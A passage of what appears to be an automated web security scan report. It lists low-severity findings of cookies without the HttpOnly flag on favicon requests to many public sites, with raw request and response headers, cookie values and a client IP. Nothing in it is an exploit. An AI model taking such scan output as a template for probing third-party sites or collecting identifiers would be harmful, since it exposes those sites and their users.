..............h.......(....... ...........@.......................G.?.V.O.u.o.........
...,.&............
w..
6>.f~....................................................................................
...[SNIP]...
14.52. http://www.addresses.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addresses.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.addresses.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:10 GMT
Server: Apache
Expires: Sat, 16 Apr 2011 06:34:10 GMT
Cache-Control: public
ETag: 3df0322508f321b7cd4e730f2fa1acacb8eb1d38
Content-Type: image/x-icon
Set-Cookie: BIGipServerp-directory=922927882.20480.0000;domain=addresses.com; expires=Sat, 02-Apr-2011 15:04:10 GMT; path=/
Content-Length: 2238

...... ..............(... ...@.......................................................!..."...$...&...'...(...*...+...,......./...1...2...3...3...3...5...6...7...6...8...9...:...:...<...?...<...?...@.
...[SNIP]...
14.53. http://www.adp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adp.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adp.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=QXZQWRSaprodadpws02CKYOQ; path=/
Content-Length: 2238
Content-Type: image/x-icon
Last-Modified: Thu, 14 Dec 2000 13:41:04 GMT
Accept-Ranges: bytes
ETag: "018d080d365c01:d1a9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:42 GMT

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
14.54. http://www.advanceautoparts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advanceautoparts.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.advanceautoparts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 16 Aug 2010 19:49:41 GMT
ETag: "536ae-47e-48df622227f40"-gzip
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC"
Content-Type: image/x-icon
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:53:19 GMT
Date: Sat, 02 Apr 2011 13:53:19 GMT
Content-Length: 1150
Connection: close
Set-Cookie: Region=DC; path=/; domain=.advanceautoparts.com
Set-Cookie: City=WASHINGTON; path=/; domain=.advanceautoparts.com
Set-Cookie: Areacode=202+703+301; path=/; domain=.advanceautoparts.com
Set-Cookie: Zip=20001-20020+20024+20026+20029-20082+20088-20091+20097-20099+20201-20245+20250-20251+20254+20260-20262+20265-20270+20277+20289+20299+20301+20303+20306-20307+20310+20314-20319+20330+20332+20336-20340+20350+20370+20372-20376+20380+20388-20395+20398+20401-20429+20431+20433-20444+20447+20451+20453+20456+20460+20463+20468-20472+20500-20510+20515+20520-20527+20530-20560+20565-20566+20570-20581+20585-20586+20590-20599; path=/; domain=.advanceautoparts.com

............ .h.......(....... ..... ....................................................................................................................
.......................................M}r....
...[SNIP]...
14.55. http://www.alibaba.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alibaba.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alibaba.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:24 GMT
Server: Apache/2.2.15 (Unix) mod_AliCookie(for apache2.x)/1.1 Beacon/3.2 mod_jk/1.2.28
Set-Cookie: ali_apache_id=173.193.214.243.64460051084706.7; path=/; domain=.alibaba.com; expires=Wed, 30-Nov-2084 01:01:01 GMT
Set-Cookie: ali_apache_sid=173.193.214.243.64460051084706.7|1301752884; path=/; domain=.alibaba.com
Last-Modified: Wed, 29 Dec 2010 15:54:08 GMT
ETag: "dc008-57e-4988e9451a800"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain

..............h.......(....... ...........@............................p...LL......t.......(H.0P......,Hx. XX.....4h.. 0@.0`...|...,,.........8x......0@X..00.. 0..............\\......|.......<D.<\..D`
...[SNIP]...
14.56. http://www.americanexpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanexpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americanexpress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:34 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1301751214570006; path=/; expires=Tue, 05-Apr-16 13:33:34 GMT; domain=.americanexpress.com
Last-Modified: Wed, 21 Oct 2009 07:07:44 GMT
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:33:35 GMT
Content-Type: image/x-icon

..............h.......(....... ................................_..}..~..~..}..|..z..z..w..x..u..t..r..p..p..q..i...............................~..}..z..x..x..o......................................|.
...[SNIP]...
14.57. http://www.americantowns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americantowns.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americantowns.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=ZONVIRS192.168.6.52CKMQY; path=/
Date: Sat, 02 Apr 2011 13:39:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 17 Dec 2010 19:33:56 GMT
ETag: "550604-436-497a0404a1100"
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8

...... ..........&...........(.......(... ...@.......................................Hj..[.V.....C...643.5=..Y_\..{s.Tc..........DGW.....?B...3m............3.3.............3..""".....".""(=.3""".....
...[SNIP]...
14.58. http://www.apartmentratings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentratings.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartmentratings.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:40 GMT
Server: Apache
Last-Modified: Wed, 18 Aug 2010 21:44:46 GMT
ETag: "1cf3b8-57e-48e1ff9632f80"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 14:03:40 GMT
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerapt-www_POOL=1189351596.0.0000; path=/

..............h.......(....... ...........@.................................I.J....l..q._.&.....|...;.^.|...'.8........x&...Q..x....U.h.n.....U...0...
.....G..}1.C.....'.{.S..p...u..=........T.....O.
...[SNIP]...
14.59. http://www.apartments.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartments.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartments.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Thu, 10 Mar 2005 19:16:51 GMT
Accept-Ranges: bytes
ETag: "eef59cb6a525c51:0"
Server: Microsoft-IIS/7.5
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|0@UserSiteType|Apt@BaseURL|www@SiteId|1@BetaNumber|169@RedirectURL|http://www.apartments.com@; domain=.apartments.com; expires=Sat, 02-Mar-2013 14:45:17 GMT; path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:17 AM&lastactivitytime=4/2/2011 8:45:17 AM&visitid=22aa4494-a1e4-4ad2-a264-1d3adfed4348&visitorid=d943f403-d2ad-491a-ad99-f9674d3c3681&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:17 GMT; path=/
Set-Cookie: AptAff=e2277821e6304b3afb4cea5f8f0c0654980fee5bfc0e3c990502f3aacef349fa;Path=/
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|0@UserSiteType|Apt@BaseURL|www@SiteId|1@BetaNumber|169@RedirectURL|http://www.apartments.com@; domain=.apartments.com; expires=Sat, 02-Mar-2013 14:45:17 GMT; path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:17 AM&lastactivitytime=4/2/2011 8:45:17 AM&visitid=22aa4494-a1e4-4ad2-a264-1d3adfed4348&visitorid=d943f403-d2ad-491a-ad99-f9674d3c3681&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:16 GMT
Set-Cookie: aptspersistence=578884780.24576.0000; path=/

..............(.......(....... ..................................."...b..........................................................................0........#....!.................31...1. .....1.0.....1.
...[SNIP]...
14.60. http://www.automotive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.automotive.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.automotive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kc4mq245jn1lcx55hwsqsuze; path=/; HttpOnly
Set-Cookie: UserPuid=2324458499622796901; domain=automotive.com; expires=Sat, 02-Apr-2061 13:40:51 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 426

GIF89a..............bf.....    .gj..........DH....15.BF........................................!&................il..........VZ.............,0....~.........$.JN.y|.......7;.@D.8<...................
..
...[SNIP]...
14.61. http://www.autotrader.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autotrader.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:47 GMT
Server: Apache
Set-Cookie: v1st=25A5F04B12A8896B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1301750747268522; path=/; expires=Thu, 12-Mar-15 13:25:47 GMT; domain=.autotrader.com
Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT
Accept-Ranges: bytes
Content-Length: 318
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/vnd.microsoft.icon
Set-Cookie: BIGipServerAT-Production_hhtp=209020426.61475.0000; path=/

..............(.......(....... ..................................................................................................TE.....DDDD...TDDDDE....E.......DI..@...D@..LT@..
..EDD.....DDDZ.@.TDTD
...[SNIP]...
14.62. http://www.autozone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autozone.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autozone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:04 GMT
Server: Apache
Last-Modified: Wed, 04 Mar 2009 22:09:57 GMT
Accept-Ranges: bytes
Content-Length: 3262
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_bvupapof.dpn=e795366b3660;Version=1;path=/

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
14.63. http://www.away.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.away.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.away.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:07:04 GMT
Server: Apache/2.2.9 (Unix) mod_jk/1.2.15
Location: http://away.com/favicon.ico
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e34a3745525d5f4f58455e445a4a423660;path=/
Set-Cookie: NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3082b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://away.com/favicon
...[SNIP]...
14.64. http://www.baidu.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.baidu.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.baidu.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:08 GMT
Server: Apache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Set-Cookie: BAIDUID=732DA6B3A161553654A9C343A4882D17:FG=1; expires=Sun, 01-Apr-12 13:56:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Last-Modified: Mon, 24 Jan 2011 11:52:05 GMT
ETag: "13e-49a963a8e0340"
Accept-Ranges: bytes
Content-Length: 318
Vary: Accept-Encoding,User-Agent
Connection: Keep-Alive
Content-Type: image/x-icon

..............(.......(....... ...................................................................................................................|.....................................................
...[SNIP]...
14.65. http://www.bankofamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bankofamerica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:42:47 GMT
Content-length: 1406
Content-type: text/plain
Last-modified: Thu, 01 Aug 2002 16:37:18 GMT
Etag: "57e-3d4963be"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3108419243.20480.0000; path=/

..............h.......(....... ...........@...............................................................................................................k...H...%............z...b...Js..2P...........
...[SNIP]...
14.66. http://www.bbt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bbt.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fdbaeebafd; path=/
accept-ranges: bytes
content-length: 1150
content-type: image/x-icon
date: Sat, 02 Apr 2011 13:41:55 GMT
etag: "80d53910c968c81:176f"
last-modified: Wed, 06 Feb 2008 14:03:35 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; Path=/

............ .h.......(....... ..... .........................6...7...6...6...7...6...6...6...6...6...7...6...6...6...6...7...7...6...6...6...6...6...6...6...6...6...7...7...6...6...7...6...6...6...6.
...[SNIP]...
14.67. http://www.bidcactus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bidcactus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bidcactus.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:39 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 16:25:10 GMT
ETag: "7d40c4-47e-49fddda8b6580"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Set-Cookie: BALANCEID=balancer.www13; path=/; domain=.bidcactus.com
Via: 1.1 bidcactus.com

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
14.68. http://www.bizjournals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizjournals.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizjournals.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:39:04 GMT
Server: Apache
Set-Cookie: bizj=YToxOntzOjM6IlVJTiI7czozMDoiMjkxNTE2MTg0MzRkOTcyNmY4Y2Y3Njg3MGZlZjhjIjt9%7C1301751544%7C6cb798d646d7838561076324272978f8ff136b64cfb9b8dd5c0d4c55c0436ed1; expires=Sun, 01-Apr-2012 13:39:04 GMT; path=/; domain=.bizjournals.com
Set-Cookie: bizj=YToxOntzOjM6IlVJTiI7czozMDoiMjkxNTE2MTg0MzRkOTcyNmY4ZDBiNThjNWNlMGIzIjt9%7C1301751544%7Cb769a95f8358eec5ae178a6877548f04d46f0bba7d768b809293bbbf75c88a93; expires=Sun, 01-Apr-2012 13:39:04 GMT; path=/; domain=.bizjournals.com
ServerID: 3
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 45605

<!DOCTYPE html>
<!-- tid: 105; lct: Wed Mar 23 15:40:16 2011 -->
<!--[if IE ]><![endif]-->
<html>
<head><title>The page you requested was not found | The Business Journals</title>
<base href="http://w
...[SNIP]...
14.69. http://www.blogrolling.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogrolling.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blogrolling.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Set-Cookie: ARPT=PKKIKIS64.99.81.10CKKUK; path=/
Date: Sat, 02 Apr 2011 13:56:10 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13
Location: http://status.blogrolling.com/
Vary: Accept-Encoding
Content-Length: 317
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://status.blogrolling.com/">here</a>.</p>
<
...[SNIP]...
14.70. http://www.business.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.business.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.business.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 3638
Content-Type: image/x-icon
Last-Modified: Mon, 25 Oct 2010 20:55:48 GMT
Accept-Ranges: bytes
ETag: "be55d08774cb1:cf1"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OUR DELa SAMa UNRa PUBa OTRa BUS UNI COM NAV INT CNT PRE LOC"
Cache-Control: max-age=31536000
Date: Sat, 02 Apr 2011 13:32:59 GMT
Connection: close
Set-Cookie: Client-IP=173.193.214.243

..............h...&... ..............(....... ...........@............................}W.....|>.......]...........mC......M....j.......x......e9..........F...V%..........sK...b..........R ...s.B....
...[SNIP]...
14.71. http://www.buzznet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzznet.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzznet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:25 GMT
Server: Apache
Set-Cookie: bncom=173.193.214.243.71371301751865415; path=/; domain=.buzznet.com
Last-Modified: Thu, 30 Sep 2010 19:44:38 GMT
ETag: "47e-4ca4e8a6"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: image/x-icon

............ .h.......(....... ..... .............................................................................................................. ...................................................
...[SNIP]...
14.72. http://www.carmax.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carmax.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.carmax.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: KMXCOM=UPIJWISKMXCOMWEB041T0x0000000e_0xc70bb1bfCOIJJ; expires=Sat, 2-Apr-2011 14:42:07 GMT; path=/
Content-Length: 894
Content-Type: image/x-icon
Last-Modified: Fri, 09 May 2008 15:32:05 GMT
Accept-Ranges: bytes
ETag: "a06c2ad6e9b1c81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:42:09 GMT

..............h.......(....... ..................................................................................m#.m#.m#.m#.m#.m#.m#.m#.m#.m#.m#.m#.m#........VH.TF.PA.K=.G8.B4.</9*z4&u/"q,.m(.j%.f".
...[SNIP]...
14.73. http://www.cars.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cars.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:43 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 30 Jan 2009 17:18:54 GMT
ETag: "9c4b-57e-663c1b80"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 13:37:43 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Content-Type: image/x-icon
Set-Cookie: cars_persist=3980465324.20480.0000; expires=Sat, 02-Apr-2011 14:08:00 GMT; path=/

..............h.......(....... ...............................t.&..........C............................................................................................................................
...[SNIP]...
14.74. http://www.cheapoair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheapoair.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cheapoair.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Mon, 13 Apr 2009 17:07:21 GMT
Accept-Ranges: bytes
ETag: "81483f4f5abcc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:24 GMT
Content-Length: 198
Set-Cookie: NSC_difbqp.dpn=4452341f3660;path=/

......................(....... .......................................................................................................................................................................
14.75. http://www.cheaptickets.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cheaptickets.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 28 Mar 2011 17:16:59 GMT
ETag: "136-49f8e1c7d78c0"
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 10:46:40 GMT
Content-Type: image/x-icon
Content-Length: 310
Server: Apache
